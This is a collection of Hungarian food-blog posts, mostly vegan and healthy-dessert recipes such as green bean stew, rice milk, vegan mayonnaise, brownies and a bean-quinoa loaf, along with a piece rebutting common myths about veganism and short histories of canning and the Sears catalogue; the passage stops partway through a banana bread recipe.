Hozzávalók: 1 kg fagyasztott vagy friss, megtisztított sárga hüvelyű zöldbab 5 nagy gerezd fokhagyma fél evőkanál (gyümölcs)cukor, vagy a kedvenc természetes édesítőd fél fej vöröshagyma felkockázva 2-3 evőkanál kukoricaliszt fél evőkanál kukoricakeményítő só ízlés szerint (kb. 2 kávéskanál) Feltesszük a zöldbabot főni egy nagy lábasban annyi vízben, hogy 1 ujjnyira ellepje. Hozzáadjuk a sót, a vöröshagymát, a fokhagymát pürésítve, és a cukrot (én most gyümölcscukrot használok, mert olcsó, és ha mértékkel használja az ember, relatíve egészséges). Puhára főzzük. Félidőnél adhatunk hozzá felkockázott főzőtököt, ami dúsítja, de az ízén nem változtat. Amikor a zöldbab puha, egy befőttesüvegbe kimérjük a kukoricalisztet és a keményítőt, és duplaannyi vízzel összerázzuk, majd hozzáadjuk a főzelékhez. Sűrű kevergetés mellett megvárjuk, hogy besűrűsödjön. Ha valamiért túl sűrű vagy túl híg, akkor víz vagy kukoricaliszt hozzáadásával egyszerűen módosíthatjuk a sűrűségét. Aki szereti, ecettel vagy növényi tejföllel is fogyaszthatja. Feltétként zöldségfasírtot, sült tofut vagy szejtánszeletet ehetünk hozzá. Jó étvágyat! The post Egyszerű, vegán zöldbabfőzelék recept, ahogy anyukám készíti (gluténmentes) appeared first on VegaNinja.
"oreo"
2017. június 28. Beautilicious
Mindenkinek van klasszikus kedvence, amit nagyon szeretne enni, de a bűntudat miatt nem teszik. Ti is imádjátok az oreot? Hoztam nektek egy olyan receptet, ami megoldja az oreo problémát. Mostmár nyugodtan ehetsz "oreot". Hozzávalók - 200gr darált zabpehely - 2cékla - 3ek kakaópor - 3ek édesítőszer + 20gr - 100ml kávé - kis rumaroma - 200gr light sajtkrém - 150gr tejföl - vanilia - fél zacskó zselatin Így készítsd - Aprító gépbe keverd össze a céklát, kávét, kakaóport és a 3ek édesítőt - Ezt öntsd a darált zabpehelyhez - Formázz keksz alakokat és tedd sütőpapírral bélelt tepsibe és negyed óra alatt süsd ki 170fokon - A krémhez keverj el egy kis tejfölben fél zacskó zselatint - Tedd hozzá a sajtkrémet, tejfölt, édesítőt, a rumaromát és vaníliát, majd tedd hütőbe - Ha elég szilárd a krém, kenj egy kicsit 2 korong közé
Rizstej házilag, barnarizsből – vegán recept
A rizstej az egyik kedvenc növényi tej opcióm. Általában boltit veszek valamelyik drogériában, de néha kicsit olcsóbban kell kihoznom – ilyenkor házilag készítem. Nagyon egyszerű, egyetlen hátránya, hogy be kell áztatni a rizst előző nap. Hozzávalók: 1 bögre barna rizs (más rizsből is készítheted, én barna rizsből csináltam) 1 liter víz 1 pici só 2 evőkanál cukor (vagy ennek megfelelő, természetes, növényi édesítő) Mosd meg a rizst egy szűrő segítségével, és áztasd be egy napra. Én befőttes üvegben, a hűtőben szoktam áztatni. Másnap öntsd le róla az áztatóvizet, és akár le is öblítheted szűrőben, folyó víz alatt. Eztán turmixold össze 1 liter új vízzel, sóval, cukorral. Az utóbbi kettő elég fontos, ezek nélkül nem lesz finom a rizstejünk. Nekem a rizsszirup a kedvenc édesítőm, de azért az nem a legköltséghatékonyabb. Használd, amit a legjobban szeretsz. Hűtőben eláll egy pár napig, de mindig fel kell rázni/keverni, mert leülepszik. Egyébként teljesen bolti minőséget lehet elérni. The post Rizstej házilag, barnarizsből – vegán recept appeared first on VegaNinja.
Nagyon finom vegán, tojásmentes majonéz házilag, azaz a veganéz receptje
Természetesen a majonéz semmilyen formában nem a világ legegészségesebb étele, mivel hozzáadott olajat és cukrot tartalmaz. De mindenképpen jobb, mint a tejes-tojásos verziója, és a veganizmus amúgy sem arról szól, hogy mindig a legegészségesebb dolgokat esszük, hanem arról, hogy nem ártunk másoknak. Ez a recept talán a legegyszerűbb a blogon, kb. 5 percbe telik elkészíteni, és ha sikerül eltalálni a megfelelő arányokat, olyan lesz, mint a bolti. 0,5 dl szójatej 0,7 dl semleges ízű olaj (pl. étolaj) 1 evőkanál cukor (vagy más, természetes édesítő) 1 csipet só 2-3 evőkanál citromlé Az összetevőket beleöntjük egy befőttes üvegbe, és botmixer segítségével alaposan elkeverjük. Minél több az olaj, annál sűrűbb a majonézünk. Csak szójatejjel működik, mert abban található szójalecitin, ami egy természetes emulgeátor, azaz segít a vízbázisú anyagnak az olajbázisú anyaggal elkeveredni, és krémet alkotni. A light szójatej sem működik sajnos erre a célra, csak a normál. És a végeredménynek nem lesz szójaíze! Ezt a veganézt aztán átalakíthatjuk tartármártássá némi extra mustárral, csinálhatunk aioli szószt belőle (fokhagymás majonéz), vagy elkeverhetjük Sriracha szósszal, vagy más csiliszósszal. Ezersziget salátaöntet is készíthető belőle, ha hagymát (reszelve vagy por formában), fokhagymát (szintén pürésítve vagy por formában), pirospaprikát, borsot, cukrot, sót, és citrom- vagy narancslevet adunk hozzá. The post Nagyon finom vegán, tojásmentes majonéz házilag, azaz a veganéz receptje appeared first on VegaNinja.
Barbecue szószos szójakocka rízzsel
2017. június 19. Vegán receptek Tőlünk Nektek
Hozzávalók:
- 200 g szójakocka beáztatva (sima vízbe áztatni, 5x, 6x kinyomkodni és cserélni a vizet rajta - így nem marad mellékíze) most felfőztem babérlevéllel és őrölt köménnyel
- 2 fej hagyma felvágva olajon pirítva
- 2 ek. nádcukor ráhintve
- 4 karcsú répa
- 1 pasztinák
- 1 kicsi padlizsán
Ekészítése :
Együtt pirítom mind, amíg a a padlizsán jól átsül, majd a 140 g-os sűrített paradicsomot ráöntöm , és egíy kevés vizet.
1 paradicsomot felkockázok, majd rá kerül 0,5 l paszírozott paradicsom édes curry, provance fűszerkeverék, fokhagymapor, szerecsendió és só .Nagyon sok fűszert felvesz a paradicsom miatt.
Tipp: Nem sütöttem a szójakockát, csak áztatva és főzve volt (!)
Köret: Fehér rizs és köles együtt főzve. Mi így is szeretjük.
Jó Étvágyat!
A hat legidegesítőbb tévhit a veganizmusról – és hogyan reagálj rájuk
Tudod mit mondanak a véleményekről? Hát, mindenkinek van. Valamilyen oknál fogva az emberek veganizmusról alkotott véleménye igazán furcsa. Íme a hat legidegesítőbb ezek közül. 1. A vegánok elgyengültek a fehérjehiány következtében Ó, ha meg tudnám mozdítani a gyenge ujjaimat, hogy leírhassam. Na várjunk csak. Annyiféleképpen lehetne erre válaszolni. Megkérdezhetnénk azokat az élsportolókat, akik növényi étrenden vannak. Esetleg Serena Williams vagy az NFL-es David Carter? Nem mondanád rájuk, hogy gyenge vegánok. Ez a félreértés onnan ered, hogy sokak szerint csak az állati eredetű táplálékokban van fehérje. De ez tévedés. Míg az állati eredetű ételekben van ugyan fehérje, jelentős mennyiségű telített zsír és koleszterin is. Rengeteg növényi fehérjeforrás létezik, ilyen például többek közt a tofu, a babfélék, a quinoa, a diófélék és még sokan mások. Ezen felül a legtöbb orvos egyetért abban, hogy a túl sok protein fogyasztása nem előnyös, főleg a fejlődés utáni korban. 2. Hitler vegetáriánus volt ezért a vegánok is szörnyetegek Ez az egyik legbutább dolog amit az emberek addig-addig ismételgettek amíg el nem hitték. Egy rövid Google keresés gyorsan rávilágít arra a tényre, hogy Hitler igenis evett húst. Robert Payne, Hitler életrajzi írója külön ki is tért arra, Hitler mennyire szerette a bajor kolbászt. Ezt az “érvet” egyszerűen logikai tévedésnek hívják. Egy tevékenységet a nácikhoz hasonlítani, annak érdekében hogy érvénytelenné tegyék, az már az utolsó menedéke azoknak, akik tudják, hogy nem nyerhetik meg a vitát. Ennek a taktikának még neve is van, Reducio al Hitlerum. 3. A vegán étrend veszélyes a gyermekek számára Inkább engedd meg, hogy az Amerikai Dietetikus Szövetség hivatalos állásfoglalásával válaszoljak erre: “Az Amerikai Dietetikus Szövetség állásfoglalása a következő: egy helyesen megtervezett vegetáriánus diéta, beleértve a szigorú/teljes vegetáriánus és vegán étrendet is, egészséges, táplálkozási szempontból megfelelő, valamint egészségügyi előnyökkel is járhat ami a különböző betegségek megelőzését és kezelését illeti. A jól megtervezett vegetáriánus étrendek az élet minden szakaszában megfelelőek, beleértve a terhességet, a szoptatást, a csecsemőkort, a gyermekkort, a felnőttkort valamint sportolóknak is megfelelő.” 4. A vegánok felsőbbrendűnek érzik magukat Ez szimplán nem igaz: pont, hogy nem tartják magukat többre másoknál, ezért is lettek vegánok. Csak gondolj bele, nem titok, hogy mennyit szenvednek az állatok az ipari állattartás során. Amennyiben ezzel tisztában vagy, és ennek ellenére is elfogyasztod az állatok testét az annyit jelent, hogy számodra fontosabb az ízlelőbimbóid, mint valakinek a tulajdon élete. Ki hiszi fontosabbnak, felsőbbrendűnek magát végeredményben? 5. A vegánok egyszerűen nem fogják fel, hogy az emberek állnak a tápláléklánc csúcsán – ha az oroszlánok esznek húst, akkor az emberek is egyenek (A Vegán Lettem blogon már egy cikk született az ember a tápláléklánc csúcsa témában.) Az oroszlánok levadásszák a prédájukat, majd a saját karmukkal tépik szét, mielőtt a szemfogaikat az áldozat nyers húsába mélyesztik. Az átlagos nyugati ember besétál a szupermarketbe, leveszi a polcról a műanyagba csomagolt húst, amelyet előtte levágtak és gondosan megnyúztak. Majd étkezés előtt egy rakás fűszerrel kell összefőzni a húst, hogy az az ember számára is gusztusos formába kerüljön. Ráadásul az oroszlánok kényszerű ragadozók, az emberek nem ragadozók. A természet kegyetlen tud lenni, az oroszlánnak húst kell ennie: nem szabad összehasonlítanunk a természet körforgását egy teljesen elhibázott, pazarló és mérhetetlenül kegyetlen ipari állathasználati rendszerrel. A tápláléklánc csúcsa? Szerintem egy oroszlán könnyedén felfalna téged. 6. A vegánok túl sok szójaterméket esznek, ez pedig elpusztítja az esőerdőket Látod a szójaburger és szója latte fogyasztó növényevőket és egyből arra gondolsz: “Hmm ők a legnagyobb fogyasztók.” Téves. Az erdőirtás legnagyobb oka az ipari állattartás. A szója többségét, 83 százalékot azokkal az állatokkal etetik meg, akik a tányérodon kötnek ki. A szójabab a világ legfőbb fehérjeforrása – és nagyrészt állatokat etetnek vele. A nem vegánok így jóval több szóját fogyasztanak indirekt módon, mint a vegánok. Ezen felül kutatások szerint ha az Európai Unióban a húsfogyasztás megfeleződne akkor a szójaliszt használata 75 százalékkal csökkenne. Harcolni akarsz az erdőirtás ellen? Legyél vegán! Eredeti cikk a plantbasednews.org-on.
Nyersétel hétvége 2017.06.02 - beszámoló
2017. június 10. Gitta nyersétel blogja
Egy gyönyörű napsütéses nyári hétvégét töltöttünk együtt :) egy remek csapattal. Fényképes beszámolónk: A pénteki vacsora kesusajtgolyó rizottóval és salátával és az epres krémtorta. Habkönnyű... a nyers tortáknál megszokott nehéz zsírosság most elmaradt. Így folyik a munka: lehet nézni, hogyan készülnek az ételek, és be is lehet kapcsolódni A reggeli zöld turmix sűrűn, finoman, hab nélkül OZEN vákumos turmixgéppel Ebédre spenótos zöldségtekercs volt salátával, Judit gyúrja a tésztáját És hogy ne maradjunk édesség nélkül, a desszert tiramisu torta Készül a vacsora: Judit, a székelykáposzta, a Thermomix és én :) Ez egy tortás hétvége volt, ribizlis kesukrémtorta sok sok gyümölccsel felvágva Vasárnap reggelire bőségesen volt nyers kenyér, ízesített kókuszzsír (pecsenyezsír) és rengeteg zöldség Vasárnap ebédre szép színes cukkini spagettit ettünk :) spenótosan, paprikásan és a brownie sem maradt el, ezúttal meggyes öntettel Hangulati elem: Laci hozott otthonról gyönyörű pünkösdi rózsát Dália végig figyelt a kis táskájából Kata Mindenkinek rajzolt valami szépet a kulacsára :) Laci :) Ha szeretnél jönni legközelebb TE is, akkor érdeklődj nálam itt: lenartgitta101@gmail.com
Meggyes pite
Azok a hagyományos piték...almás, meggyes, túrós... az összes jöhet :D Mindenki imádja, nem igaz? Ezt még jobban fogod imádni! Megse mondanád, hogy nincs benne cukor vagy fehérliszt. Nem lehet megkülönböztetni az ízét a hagyományostól. hozzávalók - 150gr kókuszliszt - 150gr zabliszt - 250gr túró - 1 banán - 50gr édesítő + Ízlés szerint a töltelékbe - 450gr meggy (magozott) - fahéj - édesítő - 1ek tápióka keményítő Így készítsd - A tésztához keverd össze a liszteket, édesítőt, banánt és túrót - Hagyd állni, míg elkészíted a tölteléket - Főzd össze a meggyet a fahéjjal, édesítővel és tápióka keményítővel - Főzd, míg puding állaga nem lesz - Nyújtsd ki a tészta egyik felét, majd töltsd meg a töltelékkel és tedd rá a másik felét - Süsd ki 180fokon 50perc alatt
Hideg-krémes eperleves
2017. június 1. Vegán receptek Tőlünk Nektek
Hozzávalók:
- 4 l víz
- 1 zacskó tört fahéj
- 2 kk szegfűszeg (egész)
- 3 zacskó vaniliás cukor
- barnacukor ízlés szerint (30 dkg, de lehet hogy valakinek édesebben ízlik)
- 1 zacskó eper puding, vagy vanilia puding, vagy puncs puding (ha nincs, 2 doboz növényi tejszín)
- 3-4 maroknyi eper (ízlés szerint)
Felteszem a vízet főni a fahéjjal és a szegfűszeggel, és kb 20 percig forralom. A pudingport kikeverem egy kis vízzel, hogy ne por formában öntsem bele a levesbe, és jól el tudjon keveredni. Ettől lesz krémes a levesem, mellesleg ad egy jó ízt is neki. Ha nincs otthon, de mégis el akarom készíteni a levest, akkor tejszín is jó lesz bele, de azt csak a végén tenném hozzá, és nem forralnám vele. A kikevert pudingot viszont beleöntöm forrás közben, és jól elkeverem. Fél citromot facsarok hozzá, és cukrozom. Főzőm pár percig, majd lezárom. Ekkor teszem bele a megmosott epret. Az eper nagyon könnyen szétfő, ezért nem forralom a levessel együtt. Én nem szeretem turmixolni, mert akkor csak a kis magocskák maradnak, így pedig a szép nagy eper is ehető hozzá.
Miután kihűlt hűtőbe teszem, mert igazán másnap finom, mikor jég hideg.
Ajánlom a tetejére a tejszínhabot, és a piritott mandulát is. Igazán különleges nyári hűsítő.
Jó étvágyat!
Epres túrókrém
2017. május 30. Gitta nyersétel blogja
Mandulatej készítésénél visszamaradt pépet fel lehet használni túró helyettesítésére. A savanykás ízt el lehet érni pár csepp citromlével, és egy kis reszelt citromhéj egyenesen csodát tesz vele. Mandulából készült epres túrós pohárkrém De ha egyszerűen csak állni hagyjuk a masszát, akár a hűtőszekrényben 2-3 napig, vagy kint szoba hőmérsékleten már 1 napig, akkor magától megsavanyodik (ahogy a tehéntej is), az illata és az íze is teljesen túrós lesz :) Szépen be lehet ízesíteni, mint a túrót, és ugyanúgy fel is lehet használni. Itt rögtönöztem egy epres pohárkrémet, de lehet mást is készíteni belőle. Így néz ki a mandulapép Hozzávalók (csak körülbelül) 10 dkg mandulapép (ami a mandulatej készítésénél megmarad. Mandulatej készítését lásd itt: Mandulatej) 1-2 evőkanál folyékony édesítőszer (agavé szirup vagy datolyaszirup, vagy esetleg méz, ha nem vagy vegán) 1/2 citrom reszelt héja 1/2 citrom leve (opcionális, lásd a leírást) 4-5 evőkanál mandulatej (opcionális, lásd a leírást) gyümölcsök ízlés szerint, itt most egy marék földieper A mandulatej készítésénél megmaradt pépet tálkába tesszük, és úgy ahogy van, kint felejtjük a konyha asztalon. Legalább 1 napra. 1 nap alatt szépen megsavanyodik, hozzákeverjük az édesítőt, a citrom héjat, és ha túl száraz az állaga, akkor visszaöntünk hozzá annyi mandulatejet, hogy kellemes lágy legyen. Érdemes még a száraz részből kivenni egy keveset, majd a pohárkrém tetejére díszítésnek. Ha nem szeretnénk természetesen savanyítani a mandula túrót, akkor egy fél citrom levével érhetjük el a savanykás ízt. Ez nem ugyanolyan, de így is finom. Villával elnyomkodott földieper vagy más gyümölccsel rétegezve poharakba töltjük. Eperrel, áfonyával, menta levéllel
Mangó lassi
2017. május 28. Gitta nyersétel blogja
Mangó lassi citromfűvel A mangó lassi egy indiai frissítő joghurtos ital. Az eredeti recept szerint a mangó lassi egyszerre sós és édes, ugyanakkor savanykás, így nagy melegben tudja pótolni az ásványi anyagokat. Szerencsére hozzá lehet már jutni érett mangóhoz, így ki lehet próbálni, szerintem érdemes. Inkább étel, mint ital, jó sűrű, tápláló. Ha inni szeretnéd, több mandulatejjel készítsd. Hozzávalók 1 adaghoz: 3 dl kókuszjoghurt 2 dl mandulatej, kókusztej, vagy a kettő keveréke 1 érett mangó 1/2 kávéskanál só édesítőszer ízlés szerint Elkészítés: az érett mangót meghámozzuk, húsát levágjuk a magjáról, és a többi hozzávalóval együtt turmixgépbe tesszük, simára turmixoljuk. Kóstoljuk, ha szükséges tegyünk hozzá édesítőszert, növényi szirupot (pl. datolya szirupot) Ha nincs kókuszjoghurtod, akkor is el tudod készíteni ezt az italt, használj több mandulatejet, és tedd hozzá egy fél citrom kifacsart levét! mangó lassi
Epres sajttorta
2017. május 26. Gitta nyersétel blogja
A tavaszi, nyári ünnepek legszebb, és mondhatom azt is, hogy a legfinomabb étele ez az epres sajttorta. Készítése közben türelem, alázat, finom mozdulatok szükségesek, itt nem szabad semmit elsietni. Az eredmény pedig lélegzetelállító. Hozzávalók egy 18 cm-es tortaformához: (a rétegek 25dkg, 50 dkg, 25 dkg, vagyis összesen ez a torta kb. 1 kg-os lesz díszítés nélkül) az alaphoz: 15 dkg beáztatott datolya 10 dkg kókuszreszelék 1 evőkanál őrölt arany lenmag csipet só a töltelékhez: 25 dkg kesudió 2 citrom leve és reszelt héja (bio citrom legyen) 2 evőkanál agavé szirup 15 dkg kókuszolaj 2-3 evőkanál tisztított víz az epres réteghez: 20 dkg eper 1 evőkanál agavé szirup 2 evőkanál útifűmaghéj a díszítéshez: eper Elkészítése: Az alaphoz először a datolyát és a fűszereket tegyük aprítógépbe, majd a lenmagot és annyi kókuszreszeléket, hogy egy nem túl lágy, formázható masszát kapjunk. Ha már kész datolyapépet használsz, akkor gép sem kell, hanem egy tálban ki tudod keverni a kókuszreszelékkel és a fűszerekkel. Inkább morzsás, mint pépes legyen. A tortaformát kibéleljük sütőpapírral, és a masszát egyenletesen lenyomkodjuk az aljára. A töltelékhez megolvasztjuk a kókuszolajat, és a citromlével, agavé sziruppal együtt turmixgépbe tesszük. Most jöhet a kesudió és épp csak annyi víz, hogy a turmixgép tudjon vele dolgozni. Ha túl sok vizet teszünk bele, a massza a tortában nem fog megszilárdulni, szobahőmérsékleten folyós lesz. Hozzáadjuk a reszelt citromhéjat is, és teljesen simára, homogénre turmixoljuk. Ráöntjük a tortaformában az alapra. A tetejét szépen simítsuk el, hogy teljesen egyenes legyen. Tegyük hidegre, hogy meg tudjon szilárdulni. (Fagyasztóba is mehet, amíg a felső réteget elkészítjük.) A következő réteghez az epret törjük össze villával, vagy aprítógépben a pulse funkcióval, hogy maradjanak benne még darabos részek. Tegyük egy szűrőbe, és a lecsöpögő eperlét fogjuk fel, kis poharakban ki lehet tálalni. A szűrőben maradt epermasszát édesítsük, majd tegyük hozzá az útifűmaghéjat (ez fogja kicsit megszilárdítani, zselésíteni a gyümölcspépet). Várni kell egy kicsit, amíg a kis maghéjak beszívják magukba a nedvességet, nem szabad türelmetlennek lenni. Ha túladagoljuk, akkor jó kemény lesz, szép és vágható, ugyanakkor a vizen kívül az útifűmaghéj az ízeket is magába szívja, és sajnos íztelen lesz a torta teteje. Szóval érdemes vigyázni. Vegyük elő a tortát a fagyasztóból, és az epres masszát simítsuk rá a tetejére. Arra vigyázzunk, hogy csak akkor tegyük rá a tortára, ha a töltelék már teljesen megszilárdult, különben bele fog folyni. Érdemes kivárni. Visszatesszük a hűtőszekrénybe teljes dermedésig. Tálalás előtt lapokra vágott eperszeletekkel díszítjük. A receptet megtalálod az Élő ételek ünnepnapokra című könyvemben, amit megrendelhetsz tőlem: lenartgitta101@gmail.com vagy a kiadótól, jobbra fent a borítóra kattintva.
Brownie-falatok (vegán)
Előző receptemben egy összetettebb történetet írtam le a konzervgyártás kezdeti lépéseiről. A következő édességhez is kapcsolódhatna akár az az írás is, hiszen szintén babkonzervet (igen, jól olvasod :) ) használtam a brownie elkészítéséhez. Ami viszont a brownie sütemény történetét illeti, egy legenda szerint úgy találták fel, hogy egy szórakozott szakács elfelejtett sütőport tenni a csokoládétortába . A másik elképzelés szerint egy szakács tortát sütött, de túl kevés volt a liszt: ennek a híresztelésnek tudható be a sütemény szokványosnál könnyedebb állaga (akkor jó, ha belül még szinte ragacsos). Mindenképpen annyit tudhatunk, hogy a süteményt először az 1897-ből származó Sears, Roebuck and Co. katalógusban említették (ami elképzelhetően nem is napjaink brownie-ja volt), amely a Sears áruházlánc korabeli ,,akciós katalógusa volt.
A képen a Sears, Roebuck and Co. 1897-es egyik katalógusa látaható,
A katalógus elindulása is érdekes történet, miszerint Richard Sears felfigyelt arra, hogy a farmerek sok pénzt költenek arra, hogy a helyi árusoktól beszerezzék az életükhöz szükséges dolgokat. Erre alapozva létrehozta az első katalógust, ami kezdetben, 1888-ban, órákat és ékszereket, majd később széles áruválasztékot kínált, s amiből postai úton lehetett rendelni. 1894-ben, amikorra már ténylegesen "Sears, Roebuck and Co. catalog" címen terjedt, varrógépeket, sportfelszereléseket, hangszereket, babakocsikat, bicikliket és ruházatot árultak a katalógus oldalain. 2 évvel később már tavaszi és őszi kiadású katalógust is megjelentettek, sőt a Britannica Encyclopedia-t is meg lehetett rendelni a katalóguson keresztül.
A katalógus-történettől kanyarodjunk vissza a tömény édességhez, a brownie-hoz. Számos brownie recept létezik, és sok fajtája nagyon egyszerűen elkészíthető, ilyen következik most.
A recept
Hozzávalók:
- 1 konzerv vese bab/ vörös bab
- 2.5 dl növényi tej
- 1 ek őrölt lenmag 2-3 ek vízben áztatva pár percig
- 1 púpos ek kókusz zsír
- 1 tk szódabikarbóna
- 1 kikapart vanília vagy 1 ek vanília aroma
- 10 dkg nyírfacukor vagy xylit vagy kókuszvirág cukor
- 10 dkg karob vagy kakaópor
- 12 dkg teljes kiőrlésű liszt vagy zabpehely liszt vagy felesben a két liszt
- dió vagy aszalt gyümölcs (nyers gyümölcs esetében nehezen sül át, mivel a gyümölcs levet ereszt)
Elkészítés:
A babkonzervet lecsepegtetjük és kicsit átmossuk. A nyírfacukorral, a növényi tejjel, a megáztatott lenmaggal, a karobbal vagy kakaóval és a kókusz zsírral mixerbe vagy gyorsaprító gépbe tesszük a babokat és csomómentes, babmentes masszává dolgozzuk. A masszát egy tálba öntjük és a teljes kiőrlésű lisztet és/vagy zablisztet, szódabikarbónát és a vaníliát hozzáadjuk. Alaposan átkeverjük. Sütőpapíros tepsibe simítjuk vagy alacsony cupcake formákba kanalazzuk a masszát. A tetejére tehetünk diót vagy más diófélét, illetve aszalt gyümölcsöt. Előmelegített sütőben kb. 9-12 percig sütjük a korongokat, a tepsiben sült brownie esetében 20 perc is szükség lehet. Tűpróbával ellenőrizzük, hogy megsültek-e. Sütés után rácson hagyjuk kihűlni.
csokis muffin vörösbabból
A hüvelyesek tökéletes forrásai fontos fehérjéknek. Fogyasztásuk rendszeresen ajánlott. Rengeteg féle képp elkészítheted, én most mutatok nektek egy édes csodát, aminek az egyik kedvenc hüvelyesem a főszereplője: a vörösbab. hozzávalók - 1konzerv vörösbab - 1dl kávé - 150g joghurt - 100gr zabliszt - 30gr kakaópor - 100gr édesítő - 75gr darált dió Így készítsd - Mosd át alaposan a vörösbabot, majd a joghurttal és a kávéval turmixold össze - A száraz alapanyagokat kever össze, majd öntsd össze a kettőt - Helyezd a masszát muffin formákba - Előmelegített sütőben süsd 180fokon 35percig
Epres citromos túrókocka
Könnyű frissítő finomság, ami mosolyt hoz az arcodra és ellátja a szervezeted a szükséges tápanyagokkal....Kitaláljátok mi az? Elárulom, hogy mire gondoltam; a kedvenct tórúkockámra hozzávalók - 2cukkini - 4 tojás - 70 gr +60 gr édesítő - 200gr zabliszt - vanilia - 175gr joghurt - 500gr túró - 100gr eper - 150gr joghurt - 1 citrom leve - fél zacskó sütőpor Így készítsd - A piskótához verj fel 2egész tojást és két fehérjét - Add hozzá a joghurtot, citromlevet és az édesítőt, majd verd habosra - Reszeld le a cukkinit, majd add a tojásos keverékhez - A lisztet keverd össze vaniliával és sütőporral, majd öntsd a masszáhot - Oszt ketté a masszát és süsd két tepsiben 180 fokon 35percig - Amíg sül készítsd el a túrúkrémet: keverd össze a 2 tojássárgáját a túrót, joghurtot, édesítőt és a citromlevet, majd kockázz bele epret
Babos quinoa fasírt (gluténmentes, vegán)
A következő receptem konzerv-babból (is) készült. Érdekelt már régóta, hogyan kezdődött a konzervgyártás története. Ki gondolná, hogy egészen Napóleonig kell visszatekintenünk? Az alábbi érdekességekett találtam róla.
Amikor az ember elkezdett földműveléssel foglalkozni és egész évben használatos élelmiszereket termeszteni, mély ismereteket szerzett, és szoros kapcsolatot teremtett táplálékforrásaival. Az ipari forradalom, nemrégiben pedig a korszerű élelmiszeripari technológia mindezt megváltoztatta.
A konzerv eredete a korai 19. századra tekint vissza, mikor Napóleon csapatainak súlyos élelmiszerhiánnyal kellett szembenézniük. 1800-ban Bonaparte Napoleon 12.000 frank jutalmat kínált fel annak, aki egy gyakorlati módszerrel tud szolgálni az élelmiszerek tartósításához a menetelő hadseregeknek; ahogy ismert mondása szól: Egy hadsereg a gyomrán menetel. Évekkel a kísérletei után, Nicolas Appert előterjesztette találmányát, miszerint az ételeket egy üvegbe kell zárni, majd megfőzni, mellyel megnyerte a díjat 1810-ben. Azt követő évben Appert nyilvánosságra hozta LArt de conserver les substances animales et végétales (avagy Az Állati és Növényi Anyagok Tartósításának Művészete) találmányát, amely az első szakácskönyv volt műfajában a modern tartósító módszerek alapjául szolgálva. 1810-ben a feltaláló személyesen - az 1812-es oroszországi hadjáratára készülő - Napóleontól vehette át a tekintélyes pénzdíjat és az Emberiség Jótevője megtisztelő címet.
A francia konzervmester által kitalált módszert egy angol vállalkozó, Peter Duran szabadalmaztatta hazájában alkalmazva Appert technológiáját különböző üveg, cserép, konzerv vagy más anyagokból készült edényeket használva. Erre megkapta az első konzerválási szabadalmat III. György királytól. Ezt vehetjük a modern konzervgyártás gyökerének. A szabadalmat továbbadta két vállalkozónak, Bryan Donkinnak és John Hallnak, akik 1813-ban megnyitották a történelem első komoly, a mai konzervekhez már hasonlító dobozokat gyártó üzemüket. Előállításuk akkoriban még elég nehézkesen történt: a konzervdobozokat ónozott vaslemezből gyártották és egy képzett dolgozó is csak hat darabot tudott összeforrasztani óránként. A kinyitásához kezdetben kalapácsra és vésőre volt szükség. A cég termékei - ügyes marketing segítségével - nagy népszerűségre tettek szert: kóstolót küldtek a királyi családnak, az admiralitásnak és a Királyi Természettudományos Akadémia, a Royal Society tagjainak, a visszaküldött véleményeket pedig hírlapokban publikálták. 1818-ban az angol haditengerészet már 25 ezer dobozzal rendelt ezekből a termékekből. Forrás1. Forrás2.
A recept
Hozzávalók:
- 1 bögre quinoa
- 1 konzerv vörösbab/vesebab
- 1 ek fűszerpaprika
- 1 tk őrölt köménymag
- 1 púpos tk (házi) ételízesítő
- 2-3 gerez összetört fokhagyma
- só
Elkészítés:
A quinoa-t főzés előtt áztatjuk kb. 5-10 percet majd alaposan átmossuk és enyhén sós vízben puhára főzzük. Főzésnél a víz ellepje, de nem kell kétszeres mennyiségű víz.
A babkonzervet kinyitjuk, lecsepegtetjük, majd átöblitjük. Amikor a quinoa már szinte megfőtt, hozzákeverjük. Fűszerezzük az összezúzott fokhagymával, ételízesítővel, őrölt köménymaggal és a fűszerpaprikával. Ha úgy érezzük, nem elég fűszeres, még igény szerint tehetünk hozzá. Ha a fasírtmassza nem állna össze, zabpelyhet vagy zabpehely lisztet keverjünk hozzá. Valamilyen kisebb tepsit kibélelünk sütőpapírral, a masszát belekanalazzuk, lesimítjuk és 180 fokon kb. 20-30 perc alatt átsütjük.
Sütés után rácson hagyjuk kihűlni, majd amikor már picit kihűlt, ehetőre, akkor szeleteljük. Fehérrépát, répát és swede/turnip-t szeletekre vágva, rövid ideig forró, sós vízben megpárolva majd sütőpapíros tepsiben fokhagymás olajjal meghintve enyhén barnulósra megsütve ettünk hozzá köretként. Nagyon finom volt. Természetesen ha Magyarországon nem elterjedt ez utóbbi, nem kell kétségbe esni, bármiféle más zöldséges köret illik hozzá (répa, petrezselyemgyökér, cékla, édesburgonya, csicsóka, csak hogy ötletet adjak).
(A swede vagy turnip nyersen a karalábéhoz hasonlít ízében, szilárdságában a zellergyökérhez. Viszont ha megfőzzük "besárgul", vagyis fehérből sárga színű zöldségben lesz részünk. Ízét tekintve pedig a krumpli/karalábé/zeller keresztezésére hasonlít. Viszont wikipédia szerint a zöldség a káposzta és a fehérrépa keresztezéséből létrejött növény gyökere.)
Banánkenyér aszalt gyümölcsökkel
Van, amikor már nem esik jól a megbarnult héjú banán, holott belül semmi baja nincs, alkalmas fogyasztásra. Remek módja a felhasználásának a következő recept. De ha nincs barna héjú banánod, de szépen érett sárga színben pompázik, akkor sem kell várnod, hiszen ugyanúgy finom édességet készíthetsz. Szerintem millikók és milliók készítik és kóstolják a különféle banánkenyereket világszerte. Az enyém márványosságában és aszalt gyümölcseiben lett különleges. Banáncsipszet is tettem hozzá és tetszett, hogy a puha és lágy tésztában megbújt néha egy roppanós falatka. Ha nem tudod, mit süss vegán barátaidnak, íme egy egyszerű, de finom recept. Olyan sokan készítik el tojással, miközben tojás nélkül is remek kenyér készülhet. Ha pedig vegán vagy, szolgáljon ötletül receptem arra, hogy mit süss leközelebb a vendégeknek/családnak.
A recept
Hozzávalók:
- 2 érett banán
- 1/2 bögre kókuszolaj
- 1/2 - 1 bögre eritrit/xylit/gyümölcscukor (vagy bármilyen cukorhelyettesítő, ízlés szerint, de gondoljunk arra, hogy az aszaltgyümölcsök is édesítik)
- 1 bögre liszt (fehérlisztet és teljes kiőrlésű lisztet fele-fele arányban használtam)
- 1 bögre zabliszt (őrölt zabpehely)
- 1 bögre növényi tej
- 1 bögre feldarabolt aszalt gyümölcs
- 1 teáskanál szódabikarbóna
- pár csepp citrom vagy narancs kifacsart leve
- 1 ek kakaó vagy karob (opcionális)
Elkészítés:
